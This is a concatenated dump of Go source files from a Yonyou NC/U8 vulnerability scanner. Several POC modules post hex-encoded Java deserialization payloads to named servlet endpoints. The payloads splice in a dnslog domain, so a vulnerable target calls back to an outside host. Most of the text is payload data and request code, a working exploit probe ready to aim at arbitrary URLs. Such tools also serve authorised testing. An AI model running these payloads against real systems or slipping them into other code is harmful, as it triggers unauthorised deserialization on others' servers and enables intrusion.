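000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))
	// NOTE(review): for client requests net/http derives Content-Length from
	// the body and may ignore a value set in Header; the fixed value is kept
	// unchanged from the original rather than guessed at.
	_, err := client.R().SetHeaders(map[string]string{
		"User-Agent":     UA,
		"Content-Length": "20434",
		"Content-Type":   "application/x-www-form-urlencoded",
	}).SetBody(body).Post(url)
	if err != nil {
		// A transport error (timeout, refused connection, TLS failure) is not
		// evidence either way, so it is reported separately from a miss.
		color.Yellow.Println("[!] 用友NC XbrlPersistenceServlet 请求失败: " + err.Error())
		return
	}
	// The dnslog record is read immediately after the POST. NOTE(review): a
	// callback that resolves slightly later would be missed unless
	// GetDnslogRecord itself waits or polls — could not tell from this file.
	if dnslog.GetDnslogRecord(session) {
		color.Green.Println("[+] 用友NC XbrlPersistenceServlet反序列化漏洞存在 -> " + url)
		return
	}
	color.Red.Println("[-] 用友NC XbrlPersistenceServlet反序列化漏洞不存在")
}
--------------------------------------------------------------------------------
/pkg/POC/u8-MonitorServlet/u8-MonitorServlet.go:
--------------------------------------------------------------------------------
package u8_MonitorServlet

import (
	"encoding/hex"
	"fmt"
	"github.com/gookit/color"
	"github.com/imroc/req/v3"
	"time"
	"yongyouScan/pkg/dnslog"
	"yongyouScan/pkg/utils"
)

var (
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

func Run(url string) {
	domain, session := dnslog.GetDnslogUrl()
	url = url + "/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet"
	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
		"User-Agent":     UA,
		"Content-Length": "16284",
		"Content-Type":   "application/x-www-form-urlencoded",
	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}",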
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 MonitorServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 MonitorServlet反序列化漏洞存在 -> " + url) 32 | 
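return
}
color.Red.Println("[-] 用友 U8 MonitorServlet反序列化漏洞不存在")
}
--------------------------------------------------------------------------------
/pkg/POC/U8-OA-getSessionList/U8-OA-getSessionList.go:
--------------------------------------------------------------------------------
// Package U8_OA_getSessionList holds the U8 OA getSessionList.jsp check.
package U8_OA_getSessionList

import (
	"encoding/hex"
	"fmt"
	"strings"
	"time"

	"github.com/gookit/color"
	"github.com/imroc/req/v3"

	"yongyouScan/pkg/dnslog"
	"yongyouScan/pkg/utils"
)

var (
	// client is shared by every call to Run; the 5 s timeout bounds how long a
	// silent host can hold the scan. EnableDumpEachRequest is kept from the
	// original; nothing in this file reads the dump.
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	// UA is the User-Agent sent with every request.
	UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

// Run posts the DNS-callback probe to getSessionList.jsp below url and prints
// the result on stdout.
//
// url is the target base URL; a trailing slash is trimmed before the endpoint
// path is appended. There is no return value: a hit on the dnslog session
// prints a green "[+]" line, no hit prints a red "[-]" line, and a transport
// error prints a yellow "[!]" line so that an unreachable or timed-out host is
// not reported as "not vulnerable".
//
// NOTE(review): the messages describe an information-leak check, but the
// request is the same DNS-callback deserialization probe the sibling checks
// send; confirm that the label and the payload are meant to go together.
func Run(url string) {
	domain, session := dnslog.GetDnslogUrl()
	url = strings.TrimSuffix(url, "/") + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
	// The body is the hex template below with the dnslog domain spliced in via
	// fmt.Sprintf, run through utils.InsertBackslashX and wrapped in a
	// {{unquote("...")}} expression. The template is kept verbatim.
	body := fmt.Sprintf("{{unquote(\"%s\")}}",
		utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))
	// NOTE(review): for client requests net/http derives Content-Length from
	// the body and may ignore a value set in Header; the fixed value is kept
	// unchanged from the original rather than guessed at.
	_, err := client.R().SetHeaders(map[string]string{
		"User-Agent":     UA,
		"Content-Length": "20434",
		"Content-Type":   "application/x-www-form-urlencoded",
	}).SetBody(body).Post(url)
	if err != nil {
		// A transport error (timeout, refused connection, TLS failure) is not
		// evidence either way, so it is reported separately from a miss.
		color.Yellow.Println("[!] 用友 U8 OA getSessionList.jsp 请求失败: " + err.Error())
		return
	}
	// The dnslog record is read immediately after the POST. NOTE(review): a
	// callback that resolves slightly later would be missed unless
	// GetDnslogRecord itself waits or polls — could not tell from this file.
	if dnslog.GetDnslogRecord(session) {
		color.Green.Println("[+] 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞存在 -> " + url)
		return
	}
	color.Red.Println("[-] 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞不存在")
}
--------------------------------------------------------------------------------
/pkg/POC/U8-ActionHandlerServlet/U8-ActionHandlerServlet.go:
--------------------------------------------------------------------------------
package U8_ActionHandlerServlet

import (
	"encoding/hex"
	"fmt"
	"github.com/gookit/color"
	"github.com/imroc/req/v3"
	"time"
	"yongyouScan/pkg/dnslog"
	"yongyouScan/pkg/utils"
)

var (
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

func Run(url string) {
	domain, session := dnslog.GetDnslogUrl()
	url = url + "/service/~uap/com.ufida.zior.console.ActionHandlerServlet"
	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
		"User-Agent":     UA,
		"Content-Length": "20327",
		"Content-Type":   "application/x-www-form-urlencoded",
	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}",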
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 ActionHandlerServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 ActionHandlerServlet反序列化漏洞存在 -> " + 
url) 32 | return 33 | } 34 | color.Red.Println("[-] 用友 U8 ActionHandlerServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/U8-CacheInvokeServlet/U8-CacheInvokeServlet.go: -------------------------------------------------------------------------------- 1 | package U8_CacheInvokeServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/service/~iufo/com.ufsoft.iufo.web.appletinvoke.CacheInvokeServlet" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "20327", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
